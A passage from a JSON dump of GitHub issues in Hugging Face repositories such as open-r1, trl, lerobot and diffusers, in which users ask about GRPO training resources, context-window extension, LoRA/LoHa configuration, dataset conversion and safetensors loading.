    "title": "How to increase the context window from 4k to 32k on qwen models ?",
    "body": "Hello,\n\nI'm trying to distill a subset of the [OpenR1-Math-220k](https://huggingface.co/datasets/open-r1/openr1-220k-math) dataset into my Qwen/Qwen2.5-Math-7B-Instruct. I want to do this via a custom SFT pipeline in order to see if I can match the results obtained in the evaluations.\n\nHowever I'm struggling increasing the context window of the Qwen math model from 4k to 32k tokens. \n\nThis is what I tried in the config.json of the model: \n\n``` \n{\n  \"_name_or_path\": \"Qwen/Qwen2.5-Math-7B-Instruct\",\n  \"architectures\": [\n    \"Qwen2ForCausalLM\"\n  ],\n  \"attention_dropout\": 0.0,\n  \"bos_token_id\": 151643,\n  \"eos_token_id\": 151645,\n  \"hidden_act\": \"silu\",\n  \"hidden_size\": 3584,\n  \"initializer_range\": 0.02,\n  \"intermediate_size\": 18944,\n  \"max_position_embeddings\": 32768,\n  \"max_window_layers\": 28,\n  \"model_type\": \"qwen2\",\n  \"num_attention_heads\": 28,\n  \"num_hidden_layers\": 28,\n  \"num_key_value_heads\": 4,\n  \"rms_norm_eps\": 1e-06,\n    \"rope_scaling\": {\n    \"type\": \"linear\",\n    \"factor\": 8.0\n  },\n  \"rope_theta\": 10000.0,\n  \"sliding_window\": null,\n  \"tie_word_embeddings\": false,\n  \"torch_dtype\": \"bfloat16\",\n  \"transformers_version\": \"4.48.1\",\n  \"use_cache\": true,\n  \"use_sliding_window\": false,\n  \"vocab_size\": 152064\n}\n```\n\nBut the generations obtained with this base model are garbage. Do you have any advices on which parameters are the best and how to be able to train the model on bigger context windows than initially released ? \n\nThanks !\n",
    "url": "https://github.com/huggingface/open-r1/issues/444",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-27T10:27:43Z",
    "updated_at": "2025-07-24T23:56:12Z",
    "user": "Jeremmmyyyyy"
  },
  {
    "repo": "huggingface/trl",
    "number": 2972,
    "title": "How many H20 (96GB) GPUs are needed to train Qwen7B with the GRPO algorithm?",
    "body": "I want to use the GRPO algorithm to train Qwen7B, but I failed using 4 H20 (96GB) GPUs with the trl library. I would like to know how many H20 GPUs are needed.",
    "url": "https://github.com/huggingface/trl/issues/2972",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-27T04:12:16Z",
    "updated_at": "2025-03-14T02:22:36Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 779,
    "title": "Is there a way for a robot arm with kinesthetic teaching function to collect data using lerobot?",
    "body": "Hello, I have a robot arm with kinesthetic teaching function. I guess I can teach my robot at the first time, and collect data from the second time using lerobot? I'm here to ask is this easy to achieve by modifying control_robot.py file? Thanks",
    "url": "https://github.com/huggingface/lerobot/issues/779",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-26T17:50:51Z",
    "updated_at": "2025-10-16T02:28:54Z",
    "user": "yzzueong"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10910,
    "title": "ValueError: Attempting to unscale FP16 gradients.",
    "body": "### Describe the bug\n\nI encountered the following error when running train_text_to_image_lora.py: ValueError: Attempting to unscale FP16 gradients.\n\nThe script I am running is as follows:\n\nexport MODEL_NAME=\"CompVis/stable-diffusion-v1-4\"\nexport DATASET_NAME=\"lambdalabs/naruto-blip-captions\"\n\naccelerate launch --mixed_precision=\"fp16\" train_text_to_image_lora.py \\\n  --pretrained_model_name_or_path=$MODEL_NAME \\\n  --dataset_name=$DATASET_NAME --caption_column=\"text\" \\\n  --resolution=512 --random_flip \\\n  --train_batch_size=1 \\\n  --num_train_epochs=100 --checkpointing_steps=5000 \\\n  --learning_rate=1e-04 --lr_scheduler=\"constant\" --lr_warmup_steps=0 \\\n  --seed=42 \\\n  --output_dir=\"sd-naruto-model-lora-clean\" \\\n  --validation_prompt=\"cute dragon creature\" --report_to=\"wandb\"\nHow can I resolve this error?\n\n### Reproduction\n\nexport MODEL_NAME=\"CompVis/stable-diffusion-v1-4\"\nexport DATASET_NAME=\"lambdalabs/naruto-blip-captions\"\n\naccelerate launch --mixed_precision=\"fp16\" train_text_to_image_lora.py \\\n  --pretrained_model_name_or_path=$MODEL_NAME \\\n  --dataset_name=$DATASET_NAME --caption_column=\"text\" \\\n  --resolution=512 --random_flip \\\n  --train_batch_size=1 \\\n  --num_train_epochs=100 --checkpointing_steps=5000 \\\n  --learning_rate=1e-04 --lr_scheduler=\"constant\" --lr_warmup_steps=0 \\\n  --seed=42 \\\n  --output_dir=\"sd-naruto-model-lora-clean\" \\\n  --validation_prompt=\"cute dragon creature\" --report_to=\"wandb\"\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nTraceback (most recent call last):\n  File \"train_text_to_image_lora.py\", line 975, in \n    main()\n  File \"train_text_to_image_lora.py\", line 856, in main\n    accelerator.clip_grad_norm_(params_to_clip, args.max_grad_norm)\n  File \"/root/miniconda3/lib/python3.8/site-packages/accelerate/accelerator.py\", line 2396, in clip_grad_norm_\n    self.unscale_gradients()\n  File \"/root/miniconda3/lib/python3.8/site-packages/accelerate/accelerator.py\", line 2340, in unscale_gradients\n    self.scaler.unscale_(opt)\n  File \"/root/miniconda3/lib/python3.8/site-packages/torch/amp/grad_scaler.py\", line 338, in unscale_\n    optimizer_state[\"found_inf_per_device\"] = self._unscale_grads_(\n  File \"/root/miniconda3/lib/python3.8/site-packages/torch/amp/grad_scaler.py\", line 260, in _unscale_grads_\n    raise ValueError(\"Attempting to unscale FP16 gradients.\")\nValueError: Attempting to unscale FP16 gradients.\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10910",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-26T14:43:57Z",
    "updated_at": "2025-03-18T17:43:08Z",
    "comments": 4,
    "user": "Messimanda"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1209,
    "title": "Is NFD type normalizer supported?",
    "body": "### Question\n\nHi,\n\nI was trying the following code on browser which uses [dewdev/language_detection](https://huggingface.co/dewdev/language_detection):\n\n`import { pipeline, Pipeline } from '@huggingface/transformers';\n\nexport class DetectLanguage {\n    private modelid: string | null = null;\n    private detectPipeline: Pipeline | null = null;\n    private initialized: boolean = false;\n\n    constructor(modelid: string = 'dewdev/language_detection') {\n        this.modelid = modelid;\n    }\n\n    async initialize() {\n        try {\n            this.detectPipeline = await pipeline('text-classification', this.modelid, {\n                dtype: 'fp32',\n                device: navigator.gpu? 'webgpu': 'wasm'\n            });\n            this.initialized = true;\n            console.log(\"Model initialization successful.\");\n        } catch (error) {\n            console.error('Error initializing language detection model with fallback:', error);\n            this.initialized = false;\n            throw error;\n        }\n    }\n\n    async detect(text: string) {\n        if (!this.initialized || !this.detectPipeline) {\n            console.error(\"Model not initialized.\");\n            return '';\n        }\n        try {\n            const language = await this.detectPipeline(text, { top: 1 });\n            return language;\n        } catch (error) {\n            console.error('Error during language detection:', error);\n            return '';\n        }\n    }\n}\n\nasync function main() {\n    const detectLanguage = new DetectLanguage();\n    await detectLanguage.initialize();\n    const text = \"This is a test sentence.\";\n    const language = await detectLanguage.detect(text);\n    console.log(`Detected language: ${language}`);\n}\n\n// Call the main function\nmain();\n`\n\nThe above code brings up the following error:\n  Error initializing language detection model with fallback: Error: Unknown Normalizer type: NFD\n      at Normalizer.fromConfig (tokenizers.js:1011:1)\n      at tokenizers.js:1187:1\n      at Array.map ()\n      at new NormalizerSequence (tokenizers.js:1187:1)\n      at Normalizer.fromConfig (tokenizers.js:993:1)\n      at new PreTrainedTokenizer (tokenizers.js:2545:1)\n      at new BertTokenizer (tokenizers.js:3277:8)\n      at AutoTokenizer.from_pretrained (tokenizers.js:4373:1)\n      at async Promise.all (:5173/index 0)\n      at async loadItems (pipelines.js:3413:1)\n\nHere is the normalizer section from tokenizer:\n`\"normalizer\": {\n    \"type\": \"Sequence\",\n    \"normalizers\": [\n      {\n        \"type\": \"NFD\"\n      },\n      {\n        \"type\": \"BertNormalizer\",\n        \"clean_text\": true,\n        \"handle_chinese_chars\": true,\n        \"strip_accents\": true,\n        \"lowercase\": true\n      }\n    ]\n  },`\n\nMay be NFD normalizer is missing.\n\nIs there any way to bypass this error? Can you please me know?\n\nThanks",
    "url": "https://github.com/huggingface/transformers.js/issues/1209",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-26T08:48:08Z",
    "updated_at": "2025-02-26T14:41:38Z",
    "user": "adewdev"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 436,
    "title": "Why is the reward low and not increased in grpo training\uff1fHow to solve\uff1f",
    "body": "my config\n# Model arguments\nmodel_name_or_path: ../experiment/models/Qwen2.5-1.5B-Instruct\n#model_revision: main\ntorch_dtype: bfloat16\nattn_implementation: flash_attention_2\n\n# Data training arguments\ndataset_name: ../experiment/datasets/NuminaMath-TIR/data\ndataset_configs:\n- default\nsystem_prompt: \"You are a helpful AI Assistant that provides well-reasoned and detailed responses. You first think about the reasoning process as an internal monologue and then provide the user with the answer. Respond in the following format: \\n...\\n\\n\\n...\\n\"\n# Num processes is less by 1 as vLLM is using 1 GPU\nnum_processes: 3\n\n# GRPO trainer config\nbf16: true\nuse_vllm: true\nvllm_device: auto\nvllm_gpu_memory_utilization: 0.7\ndo_eval: false\ngradient_accumulation_steps: 16\ngradient_checkpointing: true\ngradient_checkpointing_kwargs:\n  use_reentrant: false\n#hub_model_id: Qwen2.5-1.5B-Open-R1-GRPO\n#hub_strategy: every_save\nlearning_rate: 2.0e-05\nlog_completions: true\nlog_level: info\nlogging_first_step: true\nlogging_steps: 5\nlogging_strategy: steps\nlr_scheduler_type: cosine\nmax_prompt_length: 512\nmax_completion_length: 1024\nmax_steps: -1\nnum_generations: 6\nnum_train_epochs: 1\noutput_dir: outputs/Qwen2.5-1.5B-Open-R1-GRPO-no-difficulty\noverwrite_output_dir: true\nper_device_eval_batch_size: 16\nper_device_train_batch_size: 8\npush_to_hub: false\nreport_to:\n- none\nreward_funcs:\n- accuracy\n- format\n#- tag_count\nreward_weights:\n- 1.0\n- 1.0\n#- 1.0\nsave_strategy: \"steps\"\nsave_steps: 100\n#save_total_limit: 1\nseed: 42\nwarmup_ratio: 0.1\n",
    "url": "https://github.com/huggingface/open-r1/issues/436",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-26T05:12:18Z",
    "updated_at": "2025-02-27T01:06:53Z",
    "user": "AXy1527"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 773,
    "title": "How to overrite the code to collect action datas from others robot\uff1f",
    "body": "Hey\uff0cI have got a problem when i try to overwrite the code of lerobot to collect action datas from my own robot. Here\u2018s the detail. My robot is a single six joint robot arm, so i make a new RobotConfig, which only contains the info of the camera. And then I overwrite the fuction 'teleop_step' in file manipulator.py. I also set a default value of the robot pos to test at first.  When i start to record,  the datad of observation and action  are fine, but when it comes to call the function 'save_eposide',  error comes up, which i show below. I reall want to know what else should i suppose to do to make it work, thanks.\n\n![Image](https://github.com/user-attachments/assets/62fdd3a3-1efc-4801-8965-faf72c0005fe)\n![Image](https://github.com/user-attachments/assets/e3780dee-0dbc-4b5d-9353-c4945579f576)\n![Image](https://github.com/user-attachments/assets/d5b3afc1-4a33-41e9-8ab7-9abee076d6e4)\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/773",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-26T03:33:09Z",
    "updated_at": "2025-10-16T02:28:56Z",
    "user": "tjh-flash"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 771,
    "title": "Example of training a policy with PI0?",
    "body": "is there an example config file for training a policy with PI0 policy?",
    "url": "https://github.com/huggingface/lerobot/issues/771",
    "state": "closed",
    "labels": [
      "question",
      "policies"
    ],
    "created_at": "2025-02-25T19:39:51Z",
    "updated_at": "2025-04-03T16:44:44Z",
    "user": "pqrsqwewrty"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10904,
    "title": "CLIP Score Evaluation without Pre-processing.",
    "body": "I am referring to [Evaluating Diffusion Models](https://huggingface.co/docs/diffusers/main/en/conceptual/evaluation), specifically the quantitative evaluation using CLIP score example.\n\nWe have images of shape (6, 512, 512, 3).\n\nCLIP score is calculated using `\"openai/clip-vit-base-patch16\"`. \n\nHowever, as far as I can tell, the images are not pre-processed to match the format that `\"openai/clip-vit-base-patch16\"` was trained on (e.g., images of size 224x224 pixels). \n \nShould the images have been processed before or can we still reliably use the CLIP score with the images in their original format? \n\nPlease let me know if I have overlooked or am misunderstanding something. Thanks!   \n\n\n\n\n",
    "url": "https://github.com/huggingface/diffusers/issues/10904",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-25T16:51:44Z",
    "updated_at": "2025-03-28T15:03:20Z",
    "comments": 1,
    "user": "e-delaney"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 769,
    "title": "How to convert my ALOHA hdf5 data type to your dataset format?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/769",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-02-25T14:07:13Z",
    "updated_at": "2025-10-16T02:28:58Z",
    "user": "return-sleep"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10901,
    "title": "HunyuanVIdeo in diffusers use negative_prompt but generate wrong video",
    "body": "### Describe the bug\n\nDiffusers support negative_prompt for hunyuan_video recently, but when I use negative_prompt and set **guidance_scale** and **true_cfg_scale**, I got a video with all black elements. Maybe I set wrong parameters or save video fail. \nHow can I fix my problem? Thanks\n\n### Reproduction\n\nimport torch\nimport time\nfrom diffusers import HunyuanVideoPipeline, HunyuanVideoTransformer3DModel, AutoencoderKLHunyuanVideo\nfrom diffusers.utils import export_to_video, load_image, load_video\nNEGATIVE_PROMPT = \"Aerial view, aerial view, overexposed, low quality, deformation, a poor composition, bad hands, bad teeth, bad eyes, bad limbs, distortion\"\nmodel_path = \"/realpath/hunyuanvideo-community-HunyuanVideo\"\npipe = HunyuanVideoPipeline.from_pretrained(model_path, torch_dtype=torch.float16)\npipe.vae.enable_tiling()\npipe.to(\"cuda\")\noutput = pipe(\n    prompt=\"The video shows a man and a woman standing in the snow, wearing winter clothing and holding cups of coffee. \", \n    negative_prompt=NEGATIVE_PROMPT,\n    height=480,\n    width=720,\n    num_frames=129,\n    num_inference_steps=10,\n    true_cfg_scale=6.0,\n    guidance_scale=1.0,\n).frames[0]\nexport_to_video(output, \"diffusers_480p_output.mp4\", fps=24)\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nH20 \nresolution = 480 * 720\nsteps=10\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10901",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-02-25T11:08:43Z",
    "updated_at": "2025-07-15T07:19:15Z",
    "comments": 2,
    "user": "philipwan"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2200,
    "title": "Bug exporting Whisper?",
    "body": "### System Info\n\nHi! I'm exporting some fine-tuned whisper models, small and base, being fine-tuned in english or spanish. In some cases I've detected that the tokenizer.json is 2.423KB and in other cases 3.839, being the tokenizer.json exported for the same language. I have some models in english where the tokenizer weight's 2.423KB and others where the tokenizer weight's 3.839KB, and same for the spanish ones. \n\nWhen the tokenizer is 2.423KBs I get problems generating the output, as it reachs the max_lenght of the model, but when the tokenizer file is 3.839KBs, the output gets as it should. \n\nThe tokenizer from the original models weights 2.423KBs, and I they works well, but when finetuned the weight change. I don't know if this is an expected output,\n\n\n### Who can help?\n\n@michaelbenayoun @JingyaHuang @echarlaix\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nI have used the following URL to train my models: https://huggingface.co/blog/fine-tune-whisper\n\nThe datasets I have used in spanish are: \n\n```py\nvoxpopuli_spanish = load_dataset(\n      \"facebook/voxpopuli\", \"es\", split=\"train\", streaming=True, trust_remote_code=True\n  ) # I take 133 random instances\ncommon_voice_spanish = load_dataset(\n    \"mozilla-foundation/common_voice_17_0\",\n    \"es\",\n    split=\"train\",\n    streaming=True,\n    trust_remote_code=True,\n) # I take 66 random instances\nlibrispeech_spanish = load_dataset(\n    \"facebook/multilingual_librispeech\", \"spanish\", split=\"train\", streaming=True\n) # I take 66 random instances\n```\nI have used the same datasets for english:\nIn case of the common_voice and voxpopuli, I just change \"es\"for \"en\". For the librispeech:\n\n```py\nlibrispeech_asr = load_dataset(\n    \"openslr/librispeech_asr\", split=\"train.other.500\", streaming=True, trust_remote_code=True\n)\n```\n\nI use other private dataset that I can't share right now, but they are around 200 instances.\n\nFor exporting the model I use the following line: \n\n```\noptimum-cli export onnx --model whisper-small-es-trained whisper-small-es-onnx --task automatic-speech-recognition --opset 18\n```\nI have tested using multiple opsets, but I get the same output.\n\n### Expected behavior\n\nI don't know if the behavior is the correct one, or I the exported tokenizer.json must be always the same.",
    "url": "https://github.com/huggingface/optimum/issues/2200",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-25T09:45:02Z",
    "updated_at": "2025-03-05T20:58:30Z",
    "comments": 1,
    "user": "AlArgente"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10899,
    "title": "Whether lohaconfig is supported in the convert_state_dict_to_diffusers method",
    "body": "In the train_text_to_image_lora.py file\n\nunet_lora_config = LoraConfig(\n        r=cfg.rank,\n        lora_alpha=cfg.rank,\n        init_lora_weights=\"gaussian\",\n        target_modules=[\"to_k\", \"to_q\", \"to_v\", \"to_out.0\"],\n    )\n modified to \n\nunet_lora_config = LoHaConfig(\n        r=cfg.rank,\n        alpha=cfg.rank,\n        target_modules=[\"to_k\", \"to_q\", \"to_v\", \"to_out.0\"],\n    ), \n\n\nunet_lora_state_dict = convert_state_dict_to_diffusers(\n                            get_peft_model_state_dict(unwrapped_unet)\n                        )\nin this line, an error will occur. Please tell me how to modify it.",
    "url": "https://github.com/huggingface/diffusers/issues/10899",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-25T08:39:08Z",
    "updated_at": "2025-03-27T15:03:17Z",
    "comments": 2,
    "user": "llm8047"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3246,
    "title": "How to save the merged model trained with peft?",
    "body": "I am working on fine tuning a 7B model and due to the size, we trained it with lora- by following the guidance (https://sbert.net/examples/training/peft/README.html)\n```python\npeft_config = LoraConfig(\n        task_type=TaskType.FEATURE_EXTRACTION,\n        inference_mode=False,\n        r=8,\n        lora_alpha=32,\n        lora_dropout=0.1,\n    )\n\nmodel.add_adapter(peft_config)\n```\n\nTraining works great and we are looking for some guidances to merge the lora layer with the base model and saved.\n\nWhat we have tried:\n1. `model.save_pretrained(\"\")` => only save the lora layer\n2. using `peft` library: this doesn't seem to work correctly, as the inference result is the same as the base model.\n```\nmodel.save_pretrained(tmp_path)\nbase_model = SentenceTransformer(model_name_or_path=model_path)\nadapter_model = PeftModel.from_pretrained(base_model, adapter_tmp_path)\nmerged_model = adapter_model.merge_and_unload()\nmerged_model.config = transformers.AutoConfig.from_pretrained(model_path)\nmerged_model.save_pretrained(path)\n```\n\nWe are reaching out for insights about how to merge the sentence transformer trained peft model with the base model. Thanks!",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3246",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-25T00:56:20Z",
    "updated_at": "2025-12-05T12:33:48Z",
    "user": "chz816"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7420,
    "title": "better correspondence between cached and saved datasets created using from_generator",
    "body": "### Feature request\n\nAt the moment `.from_generator` can only create a dataset that lives in the cache. The cached dataset cannot be loaded with `load_from_disk` because the cache folder is missing `state.json`. So the only way to convert this cached dataset to a regular is to use `save_to_disk` which needs to create a copy of the cached dataset. For large datasets this can end up wasting a lot of space. In my case the saving operation failed so I am stuck with a large cached dataset and no clear way to convert to a `Dataset` that I can use. The requested feature is to provide a way to be able to load a cached dataset using `.load_from_disk`. Alternatively `.from_generator` can create the dataset at a specified location so that it can be loaded from there with `.load_from_disk`.\n\n### Motivation\n\nI have the following workflow which has exposed some awkwardness about the Datasets saving/caching.\n\n1. I created a cached dataset using `.from_generator` which was cached in a folder. This dataset is rather large (~600GB) with many shards.\n2. I tried to save this dataset using `.save_to_disk` to another location so that I can use later as a `Dataset`. This essentially creates another copy (for a total of 1.2TB!) of what is already in the cache... In my case the saving operation keeps dying for some reason and I am stuck with a cached dataset and no copy.\n3. Now I am trying to \"save\" the existing cached dataset but it is not clear how to access the cached files after `.from_generator` has finished e.g. from a different process. I should not be even looking at the cache but I really do not want to waste another 2hr to generate the set so that if fails agains (I already did this couple of times). \n- I tried `.load_from_disk` but it does not work with cached files and complains that this is not a `Dataset` (!).\n- I looked at `.from_file` which takes one file but the cached file has many (shards) so I am not sure how to make this work. \n- I tried `.load_dataset` but this seems to either try to \"download\" a copy (of a file which is already in the local file system!) which I will then need to save or I need to use `streaming=False` to create an `IterableDataset `which then I need to convert (using the cache) to `Dataset` so that I can save it. With both options I  will end up with 3 copies of the same dataset for a total of ~2TB! I am hoping here is another way to do this...\n\nMaybe I am missing something here: I looked at docs and forums but no luck. I have a bunch of arrow files cached by `Dataset.from_generator` and no clean way to make them into a `Dataset` that I can use. \n\nThis all could be so much easer if `load_from_disk` can recognize the cached files and produce a `Dataset`: after the cache is created I would not have to \"save\" it again and I can just load it when I need.  At the moment `load_from_disk` needs `state.json` which is lacking in the cache folder. So perhaps `.from_generator` could be made to \"finalize\" (e.g. create `state.json`) the dataset once it is done so that it can be loaded easily. Or provide `.from_generator` with a `save_to_dir` parameter in addition to `cache_dir` which can be used for the whole process including creating the `state.json` at the end. \n\nAs a proof of concept I just created `state.json` by hand and `load_from_disk` worked using the cache! So it seems to be the missing piece here.\n\n### Your contribution\n\nTime permitting I can look into `.from_generator` to see if adding  `state.json` is feasible.",
    "url": "https://github.com/huggingface/datasets/issues/7420",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-02-24T22:14:37Z",
    "updated_at": "2026-01-05T15:16:35Z",
    "comments": 3,
    "user": "vttrifonov"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 413,
    "title": "How many resources are required to train deepseek r1 671b using grpo?",
    "body": ".",
    "url": "https://github.com/huggingface/open-r1/issues/413",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-24T11:55:12Z",
    "updated_at": "2025-02-24T11:55:12Z",
    "user": "LiuShixing"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 577,
    "title": "Could I get safe tensor without lazy loading?",
    "body": "### System Info\n\nI see safe_open and deserialize, it seems that both two are lazy loading.\nSo if I don't want to load safetensor without lazy loading\nhow could I do, thanks\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\nI use sglang, and in sglang model_loader/weight_utils.py\nit load safetensors like this\n`if not is_all_weights_sharded:\n            with safe_open(st_file, framework=\"pt\") as f:\n                for name in f.keys():  # noqa: SIM118\n                    param = f.get_tensor(name)\n                    yield name, param\n        else:\n            result = load_file(st_file, device=\"cpu\")\n            for name, param in result.items():\n                yield name, param\n`\nI found it loads safe tensor too slow(about 20min+), whether is_all_weights_sharded is True\nand if I prefetch safetensors before load_model(like cat * > /dev/null), it could only cost 5min\nI try to use threadExecutor to parallel this code, and although get_tensor could be quick, but loading weight still cost 20min +, so I doubt that lazy loading.thanks\n\n### Expected behavior\n\nwithout lazy loading",
    "url": "https://github.com/huggingface/safetensors/issues/577",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-24T07:55:33Z",
    "updated_at": "2025-03-13T16:51:49Z",
    "comments": 1,
    "user": "voidxb"
  },
  {
    "repo": "huggingface/trl",
    "number": 2941,
    "title": "How to dynamically adjust params during grpo training?",
    "body": "How to dynamically adjust params during training? For example, I want to adopt a smaller num_generations(8) at the beginning of grpo training, and enlarge it to 32 and also adopt a larger temperature from the 50th step.",
    "url": "https://github.com/huggingface/trl/issues/2941",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-24T02:08:52Z",
    "updated_at": "2025-02-24T07:49:10Z",
    "user": "Tomsawyerhu"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 406,
    "title": "How many GPU hours you take to train a simple model?",
    "body": "I wonder how many hours you take to use this repo to train a simple model, like DeepSeek-R1-Distill-Qwen-1.5B or DeepSeek-R1-Distill-Qwen-7B, if on 8 H100?",
    "url": "https://github.com/huggingface/open-r1/issues/406",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-24T00:27:52Z",
    "updated_at": "2025-02-24T06:31:31Z",
    "user": "Red-Scarff"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 576,
    "title": "How to access header with python",
    "body": "Is there a way to access the header in Python to know the offsets of each tensor data?",
    "url": "https://github.com/huggingface/safetensors/issues/576",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-23T17:42:46Z",
    "updated_at": "2025-03-13T16:58:36Z",
    "user": "justinchuby"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10878,
    "title": "How to expand peft.LoraConfig",
    "body": "If expanding\npeft.LoraConfig\uff0c How to modify to accommodate more lora?",
    "url": "https://github.com/huggingface/diffusers/issues/10878",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-23T14:01:11Z",
    "updated_at": "2025-03-25T15:03:28Z",
    "user": "llm8047"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10874,
    "title": "Does it support adding LoHa method",
    "body": "Does it support adding LoHa method\uff1f\n\nWhere can I modify it\uff1f",
    "url": "https://github.com/huggingface/diffusers/issues/10874",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-23T12:06:14Z",
    "updated_at": "2025-03-25T15:03:41Z",
    "comments": 3,
    "user": "llm8047"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10872,
    "title": "[Feature request] Please add from_single_file support in SanaTransformer2DModel to support first Sana Apache licensed model",
    "body": "**Is your feature request related to a problem? Please describe.**\nWe all know Sana model is very good but unfortunately the LICENSE is restrictive.\nRecently a Sana finetuned model is released under Apache LICENSE. Unfortunately SanaTransformer2DModel does not support from_single_file to use it\n\n**Describe the solution you'd like.**\n\n```python\nimport torch\nfrom diffusers import SanaPipeline\nfrom diffusers import SanaTransformer2DModel\nmodel_path = \"Efficient-Large-Model/Sana_1600M_1024px_MultiLing\"\ndtype = torch.float16\ntransformer = SanaTransformer2DModel.from_single_file (\n\t\"Swarmeta-AI/Twig-v0-alpha/Twig-v0-alpha-1.6B-2048x-fp16.pth\",\n\ttorch_dtype=dtype,\n)\npipe = SanaPipeline.from_pretrained(\n\tpretrained_model_name_or_path=model_path,\n\ttransformer=transformer,\n\ttorch_dtype=dtype,\n\tuse_safetensors=True,\n)\npipe.to(\"cuda\")\npipe.enable_model_cpu_offload()\npipe.enable_vae_slicing()\npipe.enable_vae_tiling()\ninference_params = {\n\t\"prompt\": \"rose flower\",\n\t\"negative_prompt\": \"\",\n\t\"height\": 1024,\n\t\"width\": 1024,\n\t\"guidance_scale\": 4.0,\n\t\"num_inference_steps\": 20,\n\n}\nimage = pipe(**inference_params).images[0]\nimage.save(\"sana.png\")\n\n```\n\n```\n(venv) C:\\aiOWN\\diffuser_webui>python sana_apache.py\nTraceback (most recent call last):\n  File \"C:\\aiOWN\\diffuser_webui\\sana_apache.py\", line 6, in \n    transformer = SanaTransformer2DModel.from_single_file (\nAttributeError: type object 'SanaTransformer2DModel' has no attribute 'from_single_file'\n\n```\n\n**Describe alternatives you've considered.**\nNo alternatives available as far as I know\n\n**Additional context.**\nN.A.\n",
    "url": "https://github.com/huggingface/diffusers/issues/10872",
    "state": "closed",
    "labels": [
      "help wanted",
      "Good second issue",
      "contributions-welcome",
      "roadmap"
    ],
    "created_at": "2025-02-23T11:36:21Z",
    "updated_at": "2025-03-10T03:08:32Z",
    "comments": 5,
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 761,
    "title": "How to convert from custom dataset format to LeRobotDataset format? ",
    "body": "I'm trying to train a LeRobot model on some custom data I've recorded on a custom robot, but first, I need to convert that custom data into the correct format for LeRobotDataset. I'm guessing that an example of how to do this is in the `pusht_zarr.py` file. \n\nQuestions:\n1) Is the example in `pusht_zarr.py` the proper way to do this dataset format conversion\n2) I only care about predicting future actions, so I don't need a `reward` or `success` field for each frame. Can I omit these fields or should I put a dummy value for them? e.g. in these lines of code below in `pusht_zarr.py`, can I omit the `next.reward` and `next.success` fields or must I put some dummy values for them? (and if so, what are the recommended dummy values?)\n```\nframe = {\n                \"action\": torch.from_numpy(action[i]),\n                # Shift reward and success by +1 until the last item of the episode\n                \"next.reward\": reward[i + (frame_idx < num_frames - 1)],\n                \"next.success\": success[i + (frame_idx < num_frames - 1)],\n            }\n```\n",
    "url": "https://github.com/huggingface/lerobot/issues/761",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-22T02:35:36Z",
    "updated_at": "2025-02-25T19:39:08Z",
    "user": "pqrsqwewrty"
  },
  {
    "repo": "huggingface/trl",
    "number": 2922,
    "title": "How to support multi-device VLLM inference in the GRPO Trainer",
